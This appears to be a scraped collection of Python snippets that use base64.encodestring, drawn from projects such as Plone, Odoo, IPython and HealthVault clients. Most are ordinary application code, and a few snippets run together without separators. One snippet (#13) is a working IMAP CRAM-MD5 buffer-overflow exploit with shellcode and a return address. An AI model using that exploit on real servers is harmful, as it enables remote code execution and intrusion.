示例#1
0
    def fieldSerialization(self, field, value):
        """
        Custom serialization for fields which provide field values that are
        incompatible with json / JSON-standard.
        @param field:   Field-Object from Schema
        @type field:    Field
        @param value:   Return-Value of the Raw-Accessor of the Field on the
        current context
        @type value:    string or stream
        @return:        JSON-optimized value
        @rtype:         string
        """

        if isinstance(field, DateTimeField) and value:
            value = str(value)

        elif HAS_BLOBS and IBlobWrapper.providedBy(value):
            file_ = value.getBlob().open()
            value = {'filename': value.getFilename(),
                     'data': base64.encodestring(file_.read()),
                     'type': 'blob'}
            file_.close()

        elif isinstance(field, FileField) and isinstance(value, File):
            tmp = StringIO.StringIO(value.data)
            tmp.seek(0)
            value = {'filename': value.filename,
                     'data': base64.encodestring(tmp.read())}

        elif isinstance(field, QueryField):
            query = field.getRaw(self.object)
            # Cast "ZPublisher.HTTPRequest.record" instance to dict
            value = [dict(item) for item in query]

        return value
示例#2
0
    def test_delete_user(self):
        # creating another user
        email = '*****@*****.**'
        user = extract_username(email)
        root = '/user/1.0/%s' % user

        res = self.app.get(root)
        if not json.loads(res.body):
            payload = {'email': '*****@*****.**',
                       'password': '******' * 9,
                       'captcha-challenge': 'xxx',
                       'captcha-response': 'xxx'}
            payload = json.dumps(payload)
            self.app.put(root, params=payload)

        # trying to suppress the old user with the new user
        # this should generate a 401
        environ = {'HTTP_AUTHORIZATION': 'Basic %s' % \
                    base64.encodestring('%s:xxxxxxxxx' % user)}
        self.app.extra_environ = environ
        self.app.delete(self.root, status=401)

        # now using the right credentials
        token = base64.encodestring('%s:%s' % (self.user_name, self.password))
        environ = {'HTTP_AUTHORIZATION': 'Basic %s' % token}
        self.app.extra_environ = environ
        res = self.app.delete(self.root)
        self.assertTrue(json.loads(res.body))

        # tarek should be gone
        res = self.app.get(self.root)
        self.assertFalse(json.loads(res.body))
示例#3
0
def _MockFetch(url=None):
  if start_try_job._BISECT_CONFIG_PATH in url:
    return testing_common.FakeResponseObject(
        200, base64.encodestring(_BISECT_CONFIG_CONTENTS))
  elif start_try_job._PERF_CONFIG_PATH in url:
    return testing_common.FakeResponseObject(
        200, base64.encodestring(_PERF_CONFIG_CONTENTS))
 def _get_file(self, cr, uid, inv_ids, context=None):
     if context is None:
         context = {}
     ids = isinstance(ids, (int, long)) and [ids] or ids
     invoice = self.browse(cr, uid, ids, context=context)[0]
     fname_invoice = invoice.fname_invoice and invoice.fname_invoice + \
         '.xml' or ''
     aids = self.pool.get('ir.attachment').search(cr, uid, [(
         'datas_fname', '=', invoice.fname_invoice+'.xml'), (
             'res_model', '=', 'account.invoice'), ('res_id', '=', id)])
     xml_data = ""
     if aids:
         brow_rec = self.pool.get('ir.attachment').browse(cr, uid, aids[0])
         if brow_rec.datas:
             xml_data = base64.decodestring(brow_rec.datas)
     else:
         fname, xml_data = self._get_facturae_invoice_xml_data(
             cr, uid, inv_ids, context=context)
         self.pool.get('ir.attachment').create(cr, uid, {
             'name': fname_invoice,
             'datas': base64.encodestring(xml_data),
             'datas_fname': fname_invoice,
             'res_model': 'account.invoice',
             'res_id': invoice.id,
         }, context=None)#Context, because use a variable type of our code but we dont need it.
     self.fdata = base64.encodestring(xml_data)
     msg = _("Press in the button  'Upload File'")
     return {'file': self.fdata, 'fname': fname_invoice,
             'name': fname_invoice, 'msg': msg}
示例#5
0
def _make_data_file():
    """ Generates the lookup table, writes it to a .py file. """
    import base64
    
    size = (200, 50, 51)
    pdf = N.zeros(size, 'float64')
    cdf = N.zeros(size, 'float64')
    ranges = [ _make_range(_lower[i],_upper[i],size[i]) for i in xrange(len(size)) ]

    print "Generating levy_data.py ..."
    for i in xrange(size[1]):
        for j in xrange(size[2]):
            print "Calculating alpha =", ranges[1][i], "beta = ", ranges[2][j]
            for k in xrange(size[0]):
                pdf[k,i,j] = _levy_tan(ranges[0][k], ranges[1][i], ranges[2][j])
                cdf[k,i,j] = _levy_tan(ranges[0][k], ranges[1][i], ranges[2][j], True)

    file = open("levy_data.py", "wt")
    file.write("""
# This is a generated file, do not edit.
import numpy, base64

pdf = numpy.loads(base64.decodestring(
\"\"\"%s\"\"\"))\n
cdf = numpy.loads(base64.decodestring(
\"\"\"%s\"\"\"))\n""" % 
        (base64.encodestring(pdf.dumps()), base64.encodestring(cdf.dumps())) )
    file.close()
示例#6
0
 def send_message(self, address, subject, message):
   ack_data = self.api.sendMessage(
                 address,
                 self.default_address.address,
                 base64.encodestring(subject),
                 base64.encodestring(message))
   return ack_data
示例#7
0
def _encode_binary(format_dict):
    pngdata = format_dict.get('image/png')
    if pngdata is not None:
        format_dict['image/png'] = encodestring(pngdata).decode('ascii')
    jpegdata = format_dict.get('image/jpeg')
    if jpegdata is not None:
        format_dict['image/jpeg'] = encodestring(jpegdata).decode('ascii')
示例#8
0
    def post(self):
        if not self.current_user:
            raise tornado.web.HTTPError(403)
            return
        self.user = tornado.escape.json_decode(self.current_user)
        id = tornado.escape.xhtml_escape(self.user["email"])
 
        cx = sqlite3.connect("/home/work/diancan/data/dinner.db")
        cu = cx.cursor()
        data = self.get_argument('json')
        data = urllib2.unquote(data)
        data = json.loads(data)
        if id.split("@")[1] != "wandoujia.com":
            raise tornado.web.HTTPError(403)
            return
        dead = int(time.strftime("%H%M", time.localtime()))
        #if dead >= 1902:
        #    raise tornado.web.HTTPError(403)
        #    return

        str_time = time.strftime("%Y%m%d", time.localtime())
        data['real_name'] = c.get("dinner:cname:%s" % id)

        timestamp = str(int(time.time()))
        params = dict()
        params['order'] = json.dumps(data)
        params['timestamp'] = timestamp
        params['signature'] = sign(timestamp)

        params = urllib.urlencode(params)
        url = "http://api.meican.com/corps/wandoujia/addorder"
        http_client = tornado.httpclient.AsyncHTTPClient()
        response = yield tornado.gen.Task(http_client.fetch, url, method="POST",body=params)
        resp = json.loads(response.body)
        self.write(response.body)
        if resp['status'] <= 0 and resp['status'] != -5 :
            raise tornado.web.HTTPError(403,(response.body).encode("utf-8"))
            return
        elif resp['status'] == -5:
            raise tornado.web.HTTPError(403)
            return

        for i in data['order']:
            rname = i['from']
            name = i['name']

            bid = base64.encodestring(id.encode("utf-8")).strip()
            froms = base64.encodestring(rname.encode("utf-8")).strip()
            dish = base64.encodestring(name.encode("utf-8")).strip()
            number = int(i['number'])
            price = int(i['price'])
            day = int(str_time)
            li = json.dumps(i)
            c.lpush("dinner:%s:%s" % (str_time, id), li)
            cu.execute(
                'insert into orders (id,froms,dish,number,price,day) values(?,?,?,?,?,?)',
                (bid, froms, dish, number, price, day))
            cx.commit()
        self.finish("ok") 
        return
示例#9
0
def bundleProxy( executableFile, proxy ):
  """ Create a self extracting archive bundling together an executable script and a proxy
  """
  
  compressedAndEncodedProxy = base64.encodestring( bz2.compress( proxy.dumpAllToString()['Value'] ) ).replace( '\n', '' )
  compressedAndEncodedExecutable = base64.encodestring( bz2.compress( open( executableFile, "rb" ).read(), 9 ) ).replace( '\n', '' )

  bundle = """#!/usr/bin/env python
# Wrapper script for executable and proxy
import os, tempfile, sys, stat, base64, bz2, shutil
try:
  workingDirectory = tempfile.mkdtemp( suffix = '_wrapper', prefix= 'TORQUE_' )
  os.chdir( workingDirectory )
  open( 'proxy', "w" ).write(bz2.decompress( base64.decodestring( "%(compressedAndEncodedProxy)s" ) ) )
  open( '%(executable)s', "w" ).write(bz2.decompress( base64.decodestring( "%(compressedAndEncodedExecutable)s" ) ) )
  os.chmod('proxy', stat.S_IRUSR | stat.S_IWUSR)
  os.chmod('%(executable)s', stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
  os.environ["X509_USER_PROXY"]=os.path.join(workingDirectory, 'proxy')
except Exception as x:
  print >> sys.stderr, x
  sys.exit(-1)
cmd = "./%(executable)s"
print 'Executing: ', cmd
sys.stdout.flush()
os.system( cmd )

shutil.rmtree( workingDirectory )

""" % { 'compressedAndEncodedProxy': compressedAndEncodedProxy, \
        'compressedAndEncodedExecutable': compressedAndEncodedExecutable, \
        'executable': os.path.basename( executableFile ) }

  return bundle
示例#10
0
文件: microcouch.py 项目: cclauss/etc
 def do_auth(self, parts):
     if parts.username and parts.password:
         auth_tuple = (parts.username, parts.password)
         self.auth = base64.encodestring('%s:%s' % auth_tuple).strip()
     elif parts.username:
         auth_tuple = (parts.username, getpass.getpass())
         self.auth = base64.encodestring('%s:%s' % auth_tuple).strip()
示例#11
0
 def hash_key(self, key):
     guid = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
     combined = key + guid
     print combined
     hashed = sha1(combined).digest()
     print encodestring(hashed)
     return encodestring(hashed)
def get_request_url(command_str , args ):
    baseurl='http://172.16.206.143:8080/client/api?'
    request={}
    #request['command']='listUsers'
    #below is private api under cloudstack 4.0.2
    #request['command']='createVMSnapshot'
    #request['vmid']='50e9dbdd-2efe-4df0-8478-581fd43088ce'
    request['command'] = command_str
    if args is not None:
        for k,v in args.iteritems():
            request[k]=v
    #request['response']='xml'
    request['response']='json'

    request['apikey']=''
    secretkey=''

    request_str='&'.join(['='.join([k,urllib.quote_plus(request[k])]) for k in request.keys()])
    sig_str='&'.join(['='.join([k.lower(),urllib.quote_plus(request[k].lower().replace('+','%20'))])for k in sorted(request.iterkeys())])
    sig=hmac.new(secretkey,sig_str,hashlib.sha1)
    sig=hmac.new(secretkey,sig_str,hashlib.sha1).digest()
    sig=base64.encodestring(hmac.new(secretkey,sig_str,hashlib.sha1).digest())
    sig=base64.encodestring(hmac.new(secretkey,sig_str,hashlib.sha1).digest()).strip()
    sig=urllib.quote_plus(base64.encodestring(hmac.new(secretkey,sig_str,hashlib.sha1).digest()).strip())
    req=baseurl+request_str+'&signature='+sig
    return req
示例#13
0
文件: 23172_2.py 项目: B-Rich/osf_db
def exp(host, port):
       buffer = "\x90" * 193
       buffer += ("\xdb\xd2\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x0a\xbb\x71\x35\x21"
       "\xfe\x31\x58\x17\x03\x58\x17\x83\x99\xc9\xc3\x0b\x6a\xe0\x62"
       "\x75\x46\xfb\x64\x37\x04\x6e\x79\xef\x65\x40\x41\x0a\x2f\xe9"
       "\x56\xac\x9b\x21\x99\x9a\xa8\xb8\x76\x51\x44\x93\xfc\x7d\x67"
       "\x0b\xf4\x81")

       try:
               s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
               connect=s.connect((host,port))
               d=s.recv(1024)
               print d
               s.send('a001 authenticate cram-md5\r\n')
               d=s.recv(1024)
               d=d[2:1022].strip()
               print d
               m=md5.new()
               m.update(d)
               digest = m.digest()
               buffer += struct.pack('<L',  0x7765ebc0) # call eax 6014DC6E (ptr to 6014DC68)
               buffer += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
               buffer = buffer + ' ' + digest
               s.send(base64.encodestring(buffer) + '\r\n')
               print "\nsending...\n", base64.encodestring(buffer) , '\r\n'
       except:
               "Can't connect to IMAP server"
示例#14
0
def encode_images(format_dict):
    """b64-encodes images in a displaypub format dict
    
    Perhaps this should be handled in json_clean itself?
    
    Parameters
    ----------
    
    format_dict : dict
        A dictionary of display data keyed by mime-type
    
    Returns
    -------
    
    format_dict : dict
        A copy of the same dictionary,
        but binary image data ('image/png' or 'image/jpeg')
        is base64-encoded.
    
    """
    encoded = format_dict.copy()
    pngdata = format_dict.get('image/png')
    if isinstance(pngdata, bytes) and pngdata[:8] == PNG:
        encoded['image/png'] = encodestring(pngdata).decode('ascii')
    jpegdata = format_dict.get('image/jpeg')
    if isinstance(jpegdata, bytes) and jpegdata[:2] == JPEG:
        encoded['image/jpeg'] = encodestring(jpegdata).decode('ascii')
    return encoded
示例#15
0
 def testPNGFileToConvertOdpToHTML(self):
   """Test run_generate method from odp with png to html.
    This test if returns good png files"""
   generate_result = self.proxy.run_generate('test_png.odp',
                                     encodestring(
                                     open(join('data', 'test_png.odp')).read()),
                                     None, 'html',
                                     'application/vnd.oasis.opendocument.presentation')
   response_code, response_dict, response_message = generate_result
   self.assertEquals(response_code, 200)
   self.assertEquals(type(response_dict), DictType)
   self.assertNotEquals(response_dict['data'], '')
   self.assertEquals(response_dict['mime'], 'application/zip')
   output_url = join(self.tmp_url, "zip.zip")
   open(output_url, 'w').write(decodestring(response_dict['data']))
   self.assertTrue(is_zipfile(output_url))
   zipfile = ZipFile(output_url)
   try:
     png_path = join(self.tmp_url, "img0.png")
     zipfile.extractall(self.tmp_url)
     content_type = self._getFileType(encodestring(open(png_path).read()))
     self.assertEquals(content_type, 'image/png')
     m = magic.Magic()
     self.assertTrue("8-bit/color RGB" in m.from_file(png_path))
   finally:
     zipfile.close()
   if exists(output_url):
     remove(output_url)
示例#16
0
 def _process_url(self, url):
     """ Extract auth credentials from url, if present """
     parts = urlparse(url)
     if not parts.username and not parts.password:
         return url, None
     if parts.port:
         netloc = '%s:%s' % (parts.hostname, parts.port)
     else:
         netloc = parts.hostname
     url_tuple = (
                 parts.scheme,
                 netloc,
                 parts.path,
                 parts.params,
                 parts.query,
                 parts.fragment
                 )
     url = urlunparse(url_tuple)
     if parts.username and parts.password:
         auth_tuple = (parts.username, parts.password)
         auth = base64.encodestring('%s:%s' % auth_tuple).strip()
         return url, "%s" % auth
     else:
         auth_tuple = (parts.username, getpass.getpass())
         auth = base64.encodestring('%s:%s' % auth_tuple).strip()
         return url, "%s" % auth
示例#17
0
	def putFile(self, content, filename, useCompression = False, username = None):
		"""
		Puts content as a file named filename in the server's document root.
		
		ATS, campaigns, etc are stored as utf-8. So you should make sure
		your content is utf-8 encoded when using this method.
		
		Automatically creates missing directories to filename, if needed.
		
		If the filename points outside the document root, returns False.
		
		@type  content: (buffer-like) string (typically utf-8)
		@param content: the file content
		@type  filename: string
		@param filename: the complete path within the docroot of the filename to create/modify
		@type  useCompression: bool
		@param useCompression: if set to True, compress the content before sending it (requires Ws 1.3)
		@type  username: string
		@param username: if set, the username of the user who is writing this file, for
		revisions management (requires Ws 1.7)
		
		@throws Exception in case of a (technical ?) error
		
		@rtype: bool
		@returns: True if the creation/update was ok, False otherwise
		"""
		self.getLogger().debug("Putting file %s to repository..." % filename)
		if useCompression:
			payload = base64.encodestring(zlib.compress(content))
			res = self.__proxy.putFile(payload, filename, True, username)
		else:
			payload = base64.encodestring(content)
			res = self.__proxy.putFile(payload, filename)
		self.getLogger().debug("putFile: " + str(res))
		return res
 def __init__(self, ticket):
     self.ticket = ticket
     self.rid = None
     if version == 3:
         self.auth = str(base64.encodestring(bytes('%s:%s' % (rb_user, rb_pass), 'ascii')), 'ascii').replace('\n', '')
     else:
         self.auth = str(base64.encodestring(bytes('%s:%s' % (rb_user, rb_pass)))).replace('\n', '')
     try:
         opener = None
         if version == 3:
             opener = urllib.request.build_opener()
         else:
             opener = urllib2.build_opener()
             
         opener.addheaders = [('Authorization', 'Basic %s' % self.auth)]
         opener.addheaders = [('Accept', 'application/json')]
         url = opener.open("https://reviews.apache.org/api/search/?q=%s" % self.ticket)
         
         data = None
         if version == 3:
             data = str(url.read(), 'ascii')
         else:
             data = str(url.read())
                 
         obj = json.loads(data)
         if "search" in obj and "review_requests" in obj['search']:
             for key in range(len(obj['search']['review_requests'])):
                 summary = obj['search']['review_requests'][key]['summary'] + " "
                 id = obj['search']['review_requests'][key]['id']
                 if re.search(self.ticket + "\D", summary):
                     self.rid = id
                     break
     except:    
         logging.warning("urllib error")
示例#19
0
	def __init__(self, server, root, username, password):
		self.server = server
		self.root = root
		self.username = username
		self.password = password
		self.authentication = "Basic %s" % base64.encodestring('%s:%s' % (self.username, self.password))[:-1]
		
		try:
			response = urltools.Request(self.root, base=self.server, expect=urltools.HTML)
		except urllib2.HTTPError, e:
			if hasattr(e, "code") and e.code == 401:
				base64string = base64.encodestring('%s:%s' % (self.username, self.password))[:-1]
				try:
					response = urltools.Request(
						self.root,
						base=self.server,
						expect=urltools.HTML,
						headers={"Authorization": "Basic %s" % base64string}
					)
				except:
					debug.debug_exception()
					raise
			else:
				debug.debug_exception()
				raise
示例#20
0
    def pic_post(self,**kw):
        if kw.has_key("dbport"):
            dbport=kw.get("dbport")
        else:
            dbport=kw.get("en_dbport")

        #_logger.info(request.httprequest.files)
        if kw.get("choosefile"):
            key="CN"
            id=kw.get("cn_data_id").encode("utf-8")
            mimetype=kw.get("choosefile").mimetype
        elif kw.get("en_choosefile"):
            key="EN"
            id=kw.get("en_data_id").encode("utf-8")
            mimetype=kw.get("en_choosefile").mimetype
        #_logger.info(dir(kw.get("choosefile").stream))
        #_logger.info(base64.encodestring(kw.get("choosefile").stream.read()))
        if key=="CN":
            fs=base64.encodestring(kw.get("choosefile").stream.read())
        else:
            fs=base64.encodestring(kw.get("en_choosefile").stream.read())
        conn = pymongo.Connection(self.DBIP,int(dbport))
        db = conn.disease #连接库
        res=db.disease.find_one({"_id":id})
        res[key]['pic']={"mimetype":mimetype,"base64":fs}
        db.disease.update({"_id":id},res)
        return 'OK'
示例#21
0
 def addCategory(self, title, url, action, menu=None):
     url=sys.argv[0]+"?url="+base64.encodestring(url)+"&title="+base64.encodestring(title)+"&action="+urllib.quote_plus(action)
     listitem=xbmcgui.ListItem(title,iconImage="DefaultFolder.png", thumbnailImage="DefaultFolder.png")
     listitem.setInfo( type="Video", infoLabels={ "Title": title } )
     if menu:
         listitem.addContextMenuItems(menu, replaceItems=True)
     xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=url, listitem=listitem, isFolder=True)
示例#22
0
 def _hashPassword(self, password, scheme, salt=None):
     """
     Return hashed password (including salt).
     """
     scheme = scheme.lower()
     if not scheme in AVAIL_USERPASSWORD_SCHEMES.keys():
         raise ValueError, 'Hashing scheme %s not supported for class %s.' % (
             scheme, self.__class__.__name__
         )
         raise ValueError, 'Hashing scheme %s not supported.' % (scheme)
     if salt is None:
         if scheme=='crypt':
             salt = _salt(saltLen=2, saltAlphabet=CRYPT_ALPHABET)
         elif scheme in ['smd5', 'ssha']:
             salt = _salt(saltLen=4, saltAlphabet=None)
         else:
             salt = ''
     if scheme=='crypt':
         return crypt.crypt(password, salt)
     elif scheme in ['md5', 'smd5']:
         return base64.encodestring(md5(password.encode()+salt).digest()+salt).strip()
     elif scheme in ['sha', 'ssha']:
         return base64.encodestring(sha(password.encode()+salt).digest()+salt).strip()
     else:
         return password
示例#23
0
 def get_image(self, cr, uid, id, context=None):
     each = self.read(cr, uid, id, ['link', 'url', 'name', 'file_db_store', 'product_id', 'name', 'extention'])
     if each['link']:
         (filename, header) = urllib.urlretrieve(each['url'])
         f = open(filename , 'rb')
         img = base64.encodestring(f.read())
         f.close()
     else:
         local_media_repository = self.pool.get('res.company').get_local_media_repository(cr, uid, context=context)
         if local_media_repository:
             product_code = self.pool.get('product.product').read(cr, uid, each['product_id'][0], ['default_code'])['default_code']
             full_path = os.path.join(local_media_repository, product_code, '%s%s'%(each['name'], each['extention']))
             if os.path.exists(full_path):
                 try:
                     f = open(full_path, 'rb')
                     img = base64.encodestring(f.read())
                     f.close()
                 except Exception, e:
                     logger = netsvc.Logger()
                     logger.notifyChannel('product_images', netsvc.LOG_ERROR, "Can not open the image %s, error : %s" %(full_path, e))
                     return False
             else:
                 logger = netsvc.Logger()
                 logger.notifyChannel('product_images', netsvc.LOG_ERROR, "The image %s doesn't exist " %full_path)
                 return False
         else:
示例#24
0
def _mapOid(id_mapping, oid):
    idprefix = str(u64(oid))
    id = id_mapping[idprefix]
    old_aka = encodestring(oid)[:-1]
    aka=encodestring(p64(long(id)))[:-1]  # Rebuild oid based on mapped id
    id_mapping.setConvertedAka(old_aka, aka)
    return idprefix+'.', id, aka
示例#25
0
文件: views.py 项目: corwinliu/lab2
def setting(request):
	
	print "home"
	user =request.user
	ph=PHOTO.objects.create()
	if request.method == 'POST':
		print "post"
		
		print request.FILES
		if 'photo' in request.FILES:
			if request.FILES['photo'].size > 3500000:
				return render_to_response('home.html',{'overflow':1} ,context_instance=RequestContext(request))	

#log
			LOG.objects.create(meta = request.META,date =datetime.datetime.now())

			try:	
				ph.photo = request.FILES['photo']
				ph.save()
				ph2 = PHOTO.objects.create()
				t = random.randint(0,1000000)
				process(Image.open(ph.photo.path)).save(str(t)+'out.png')
				ph2.photo.save("qwe",File(open(str(t)+'out.png')))
			except Exception,e:
				print "erro",e
			ck = 0
			if ph2.photo:
				code = base64.encodestring("hello"+str(ph2.pk)+"world").strip()
				
			else:
				code = base64.encodestring("hello"+str(ph.pk)+"world").strip()
				ck=1
			return HttpResponseRedirect(reverse('usermanager:result', args=(code,ck,)))
		else:
			pass
 def getThings(self, hv_datatype):
     header = '<header>\
                     <method>GetThings</method>\
                     <method-version>1</method-version>\
                     <record-id>' + self.record_id + '</record-id>\
                     <auth-session>\
                         <auth-token>' + self.auth_token + '</auth-token>\
                         <offline-person-info>\
                             <offline-person-id>' + self.person_id + '</offline-person-id>\
                         </offline-person-info>\
                     </auth-session>\
                     <language>en</language>\
                     <country>US</country>\
                     <msg-time>' + self.time_gen() + '</msg-time>\
                     <msg-ttl>36000</msg-ttl>\
                     <version>0.0.0.1</version>'
     
     #QUERY INFO 
     info = '<info><group><filter><type-id>' + hv_datatype + '</type-id></filter><format><section>core</section><xml/></format></group></info>'
     
     # INFO TO ADD WEIGHT.. change METHOD in header to PutThings
     #info = '<info><thing><type-id>3d34d87e-7fc1-4153-800f-f56592cb0d17</type-id><data-xml><weight><when><date><y>2008</y><m>6</m><d>15</d></date><time><h>10</h><m>23</m><s>10</s></time></when><value><kg>60</kg><display units="lb" units-code="lb">120</display></value></weight><common/> </data-xml> </thing> </info>'
     
     infodigest = base64.encodestring(sha1(info).digest()) 
     headerinfo = '<info-hash><hash-data algName="SHA1">' + infodigest.strip() + '</hash-data></info-hash>'
     header = header + headerinfo + '</header>'
     
     hashedheader = hmac.new(self.sharedsec, header, 'sha1')
     hashedheader64 = base64.encodestring(hashedheader.digest())
     
     hauthxml = '<auth><hmac-data algName="HMACSHA1">' + hashedheader64.strip() + '</hmac-data></auth>'
     payload = '<wc-request:request xmlns:wc-request="urn:com.microsoft.wc.request">' + hauthxml + header + info + '</wc-request:request>'
     response = self.sendRequest(payload)
     return response
 def putThings(self, hv_datatype, data_xml):
     header = '<header>\
                     <method>PutThings</method>\
                     <method-version>1</method-version>\
                     <record-id>' + self.record_id + '</record-id>\
                     <auth-session>\
                         <auth-token>' + self.auth_token + '</auth-token>\
                         <offline-person-info>\
                             <offline-person-id>' + self.person_id + '</offline-person-id>\
                         </offline-person-info>\
                     </auth-session>\
                     <language>en</language>\
                     <country>US</country>\
                     <msg-time>' + self.time_gen() + '</msg-time>\
                     <msg-ttl>36000</msg-ttl>\
                     <version>0.0.0.1</version>'
     
     #QUERY INFO
     info = '<info><thing><type-id>' + hv_datatype + '</type-id><data-xml>' + data_xml + '</data-xml></thing></info>'
     
     infodigest = base64.encodestring(sha1(info).digest()) 
     headerinfo = '<info-hash><hash-data algName="SHA1">' + infodigest.strip() + '</hash-data></info-hash>'
     header = header + headerinfo + '</header>'
     
     hashedheader = hmac.new(self.sharedsec, header, 'sha1')
     hashedheader64 = base64.encodestring(hashedheader.digest())
     
     hauthxml = '<auth><hmac-data algName="HMACSHA1">' + hashedheader64.strip() + '</hmac-data></auth>'
     payload = '<wc-request:request xmlns:wc-request="urn:com.microsoft.wc.request">' + hauthxml + header + info + '</wc-request:request>'
     response = self.sendRequest(payload)
     return response
示例#28
0
def add_shell(siteurl,sitepass,config,remarks,type_id,script,coding):  #添加数据
    try:
        global treeWidget_id  #当前选择ID
        # siteurl #URL
        # sitepass  #密码
        # config   #配置
        # remarks  备注
        # type_id #类别
        # script  #脚本类型  asp   php
        # coding   #编码方式
        config=base64.encodestring(str(config)) #encodestring编码    解码decodestring
        remarks=base64.encodestring(u"%s"%(remarks)) #encodestring编码    解码decodestring
        # sql_data="insert into sitetable(type_id,siteurl,sitepass,config,remarks,script,coding,createtime) " \
        #          "VALUES((select ID from type where name='%s'),'%s','%s','%s','%s','%s','%s','%s')"\
        #          %(base64.encodestring(str(type_id)),siteurl,sitepass,config,remarks,script,coding,str(time.time()))
        sql_data="insert into sitetable(type_id,siteurl,sitepass,link,config,remarks,script,coding,createtime) " \
                 "VALUES(%s,'%s','%s','%s','%s','%s','%s','%s','%s')" \
                 %(str(type_id),siteurl,sitepass,"2",config,remarks,script,coding,str(time.time()))
        if shell_sql.mysqlite3_insert(sql_data):
            #加载目录之前先加载SHELL列表
            add_tableWidget(str(ui.treeWidget_id))   #加载当前列表
            treeWidget_work.reload_tree()  #加载目录
            msg.msg_lower_Left(u"添加SHELL  url:%s   成功"%(str(siteurl)))  #右下角提示
            main_ui.tableWidget.scrollToBottom()   #定位到列表最下面
        else:
            msg.msg_lower_Left(u"添加SHELL  url:%s   失败"%(str(siteurl)))  #右下角提示
    except BaseException, e:
        log.logging.debug("except:%s"%(str(e)))
 def store_credentials(self, acc, credentials):
     try:
         logger.debug("Storing base64 credentials for account: %s" % (acc.get_name()))
         acc["username"] = base64.encodestring(credentials.username)
         acc["password"] = base64.encodestring(credentials.password)
     except Exception, e:
         raise KeyringException("Cannot encode the base64 username password for account %s" % (acc.get_name()), e)
示例#30
0
    def _get_api_cfg(self):
        if self._api_cfg:
            # return cached configuration
            return self._api_cfg

        if self.configuration.blockbridge_auth_scheme == 'password':
            user = self.configuration.safe_get('blockbridge_auth_user')
            pw = self.configuration.safe_get('blockbridge_auth_password')
            creds = "%s:%s" % (user, pw)
            if six.PY3:
                creds = creds.encode('utf-8')
                b64_creds = base64.encodestring(creds).decode('ascii')
            else:
                b64_creds = base64.encodestring(creds)
            authz = "Basic %s" % b64_creds.replace("\n", "")
        elif self.configuration.blockbridge_auth_scheme == 'token':
            token = self.configuration.blockbridge_auth_token or ''
            authz = "Bearer %s" % token

        # set and return cached api cfg
        self._api_cfg = {
            'host': self.configuration.blockbridge_api_host,
            'port': self.configuration.blockbridge_api_port,
            'base_url': '/api/cinder',
            'default_headers': {
                'User-Agent': ("cinder-volume/%s" %
                               BlockbridgeISCSIDriver.VERSION),
                'Accept': 'application/vnd.blockbridge-3+json',
                'Authorization': authz,
            },
        }

        return self._api_cfg
示例#31
0
    def offers_apply(self,
                     offer=None,
                     next_stage=None,
                     submission=None,
                     is_new=None,
                     **post):

        #If no user connected, force connection
        #TODO: Redirect to submission page if offer variable is in session
        if not request.session.uid:
            request.session.update({'offer': offer.id})
            return login_redirect()

        #Get the candidate, if no candidate create one
        sudo_env = request.env(user=SUPERUSER_ID)
        env = request.env()
        candidate = env.user

        #Get the submission, if no submission call creation template
        if not submission:
            if request.session.get('submission'):
                submission = candidate.submissions.filtered(
                    lambda s: s.id == int(request.session.get('submission')))
            if not submission or is_new == 'new':
                submission = env['project.submission'].create({
                    'name':
                    '/',
                    'offer':
                    offer.id,
                    'candidate':
                    candidate.id,
                })
        error = {}
        request.session.update({'submission': submission.id})
        #Save the current stage
        current_stage = post.get('current_stage') and int(
            post.get('current_stage'))
        try:
            if bool(post) and post.get('submit') != 'cancel':
                if post.get('unlink-doc'):
                    #TODO: call with adequate access right. Sudo might e dangerous if the id passed is wrong
                    sudo_env['ir.attachment'].browse(
                        int(post.get('unlink-doc'))).unlink()
                if post.get('unlink-task'):
                    submission.tasks.filtered(lambda t: t.id == int(
                        post.get('unlink-task'))).unlink()
                if post.get('unlink-partner'):
                    submission.costs.filtered(lambda c: c.partner.id == int(
                        post.get('unlink-partner'))).unlink()
                    submission.write(
                        {'partners': [(3, int(post.get('unlink-partner')))]})
                    partner = sudo_env['res.partner'].browse(
                        int(post.get('unlink-partner')))
                    if not partner.submissions:
                        partner.unlink()
                if post.get('unlink-budgetline'):
                    env['project.submission.budgetline'].browse(
                        int(post.get('unlink-budgetline'))).unlink()
                #Stage 1: Project general informations
                if current_stage == 1:
                    value = {
                        'name':
                        post.get('name'),
                        'acronyme':
                        post.get('acronyme'),
                        'duration':
                        post.get('duration'),
                        'field_ids': [(6, 0, [
                            int(x)
                            for x in request.httprequest.form.getlist('fields')
                        ])],
                        'keywords':
                        post.get('keywords'),
                        'description':
                        post.get('description'),
                        'n_related_publications':
                        post.get('n_related_publications'),
                        'trl':
                        post.get('trl'),
                        'n_ing_doc':
                        post.get('n_ing_doc'),
                        'n_master_pfe':
                        post.get('n_master_pfe'),
                    }
                    submission.write(value)
                #Stage 2: Candidate general informations
                elif current_stage == 2:
                    value = {
                        'name': post.get('name'),
                        'function': post.get('function'),
                        'phone': post.get('phone'),
                        'mobile': post.get('mobile'),
                        'email': post.get('email'),
                    }
                    candidate.write(value)
                    if post.get('organisme'):
                        if candidate.parent_id:
                            candidate.parent_id.write(
                                {'name': post.get('organisme')})
                        else:
                            organisme = sudo_env['res.partner'].create(
                                {'name': post.get('organisme')})
                            candidate.write({'parent_id': organisme.id})
                    else:
                        if candidate.parent_id:
                            part = candidate.parent_id
                            candidate.parent_id = False
                            """try:
                                part.unlink()
                            except Exception:
                                pass"""
                    if post.get('inventor'):
                        inventor_value = {
                            'name': post.get('inventor'),
                            'phone': post.get('inventor_phone'),
                            'mobile': post.get('inventor_mobile'),
                            'email': post.get('inventor_email'),
                        }
                        if submission.inventor:
                            submission.inventor.write(inventor_value)
                        else:
                            inventor = sudo_env['res.partner'].create(
                                inventor_value)
                            submission.write({'inventor': inventor.id})
                    else:
                        if submission.inventor:
                            part = submission.inventor
                            submission.inventor = False
                            """try:
                                part.unlink()
                            except Exception:
                                pass"""
                    if post.get('ufile'):
                        for file in request.httprequest.files.getlist('ufile'):
                            attachment_value = {
                                'name': file.filename,
                                'res_name': value['name'],
                                'res_model': 'res.users',
                                'res_id': candidate.id,
                                'datas': base64.encodestring(file.read()),
                                'datas_fname': file.filename,
                            }
                            env['ir.attachment'].create(attachment_value)
                        candidate._get_attached_docs()

                #Stage 3: Project partners informations
